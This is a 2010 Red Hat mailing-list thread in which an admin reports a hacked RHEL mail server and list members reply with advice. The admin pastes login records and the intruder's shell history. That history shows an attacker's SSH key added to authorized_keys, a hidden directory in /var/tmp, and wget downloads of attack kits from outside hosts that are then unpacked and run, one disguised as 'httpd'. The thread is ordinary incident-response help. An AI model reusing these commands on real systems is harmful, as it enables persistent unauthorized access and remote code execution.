help
Marti, Robert
RJM002 at shsu.edu
Thu Jan 28 12:11:44 UTC 2010
Brute force attacks. Leaving root ssh open to the world us begging to
be owned like this. Always turn that off or use key only auth for root
on Internet facing boxes.
Sent from my iPhone
On Jan 28, 2010, at 0:33, "Joy Methew" <ml4joy at gmail.com> wrote:
> still i m thinking how he/she got my password??
>
>
> On Thu, Jan 28, 2010 at 11:58 AM, Joy Methew <ml4joy at gmail.com> wrote:
>
>> i have changed my root password
>>
>>
>> On Thu, Jan 28, 2010 at 11:44 AM, Wahyu Darmawan <Wahyu.Darmawan at ag-it.com
>>> wrote:
>>
>>> You may change your root password first, and then you can continue
>>> to
>>> analyze your system.
>>>
>>> ________________________________________
>>> From: redhat-list-bounces at redhat.com [redhat-list-
>>> bounces at redhat.com] On
>>> Behalf Of Joy Methew [ml4joy at gmail.com]
>>> Sent: Thursday, January 28, 2010 12:59 PM
>>> To: General Red Hat Linux discussion list
>>> Subject: help
>>>
>>> Hello all,
>>> i m using RHEL5.3 as a my mail server with real
>>> ip.i
>>> configure my system mostly remotely.last login time of my system
>>> 27 jan
>>> from this ip 118.129.153.43.
>>> than i try to login at 28 jan in morning so i can`t got
>>> authentication as
>>> root from my last password.
>>> than i reboot the system reset my password.
>>> i login as a root than i run "last" command i m sending tha first
>>> 10 lines
>>> of last command...i thinks someone hack my system.i am sending
>>> history
>>> command output.
>>> now i remove .ssh directory and /var/tmp/*
>>>
>>> please suggest wat is this??
>>>
>>> thanks
>>>
>>> last command out put:
>>> root pts/1 117.199.118.234 Thu Jan 28 10:58 still
>>> logged in
>>> root pts/0 117.199.118.234 Thu Jan 28 10:49 still
>>> logged in
>>> root tty1 Thu Jan 28 10:48 - 10:52
>>> (00:04)
>>> reboot system boot 2.6.18-128.el5PA Thu Jan 28 10:45
>>> (00:25)
>>> root pts/2 165.red-79-153-1 Thu Jan 28 01:42 - 01:52
>>> (00:09)
>>> root pts/2 165.red-79-153-1 Wed Jan 27 23:02 - 01:27
>>> (02:25)
>>> root pts/2 165.red-79-153-1 Wed Jan 27 22:33 - 22:34
>>> (00:00)
>>> root pts/3 165.red-79-153-1 Wed Jan 27 22:32 - 22:33
>>> (00:00)
>>> root pts/2 118.129.153.43 Wed Jan 27 22:31 - 22:32
>>> (00:01)
>>> root pts/2 117.199.114.189 Wed Jan 27 15:47 - 15:51
>>> (00:03)
>>>
>>> What is 165.red-79........this is nt my ip.
>>>
>>>
>>> History Output
>>>
>>> 115 cat /proc/cpuinfo
>>> 116 mkdir .ssh
>>> 117 cd .ssh
>>> 118 echo ssh-rsa
>>>
>>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH
>>> +iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ
>>> +xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf
>>> +I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh;
>>> chmod 600
>>> ~/.ssh/authorized_keys
>>> 119 cd /var/tmp
>>> 120 mkdir " "
>>> 121 cd " "
>>> 122 passwd
>>> 123 echo ssh-rsa
>>>
>>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH
>>> +iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ
>>> +xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf
>>> +I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh;
>>> chmod 600
>>> ~/.ssh/authorized_keys
>>> 124 ps -x
>>> 125 cd /var/tmp
>>> 126 w
>>> 127 wget http://kok.ucoz.de/gosh.tgz
>>> 128 tar xvf gosh.tgz
>>> 129 cd gosh
>>> 130 chmod +x *
>>> 131 ./go.sh 121
>>> 132 w
>>> 133 ps -x
>>> 134 ps -aux
>>> 135 cd /var/tmp
>>> 136 cd " "
>>> 137 ls -a
>>> 138 wget http://helpbnc.myftp.org/danger/fld.tgz
>>> 139 tar xzvf fld.tgz
>>> 140 cd fld
>>> 141 chmod +x *
>>> 142 nano cyc.acc
>>> 143 nano cyc.acc.1
>>> 144 nano cyc.set
>>> 145 ./httpd
>>> 146 w
>>> --
>>> redhat-list mailing list
>>> unsubscribe mailto:redhat-list-request at redhat.com?
>>> subject=unsubscribe
>>> https://www.redhat.com/mailman/listinfo/redhat-list
>>>
>>> --
>>> redhat-list mailing list
>>> unsubscribe mailto:redhat-list-request at redhat.com?
>>> subject=unsubscribe
>>> https://www.redhat.com/mailman/listinfo/redhat-list
>>>
>>
>>
> --
> redhat-list mailing list
> unsubscribe mailto:redhat-list-request at redhat.com?subject=unsubscribe
> https://www.redhat.com/mailman/listinfo/redhat-list
More information about the redhat-list
mailing list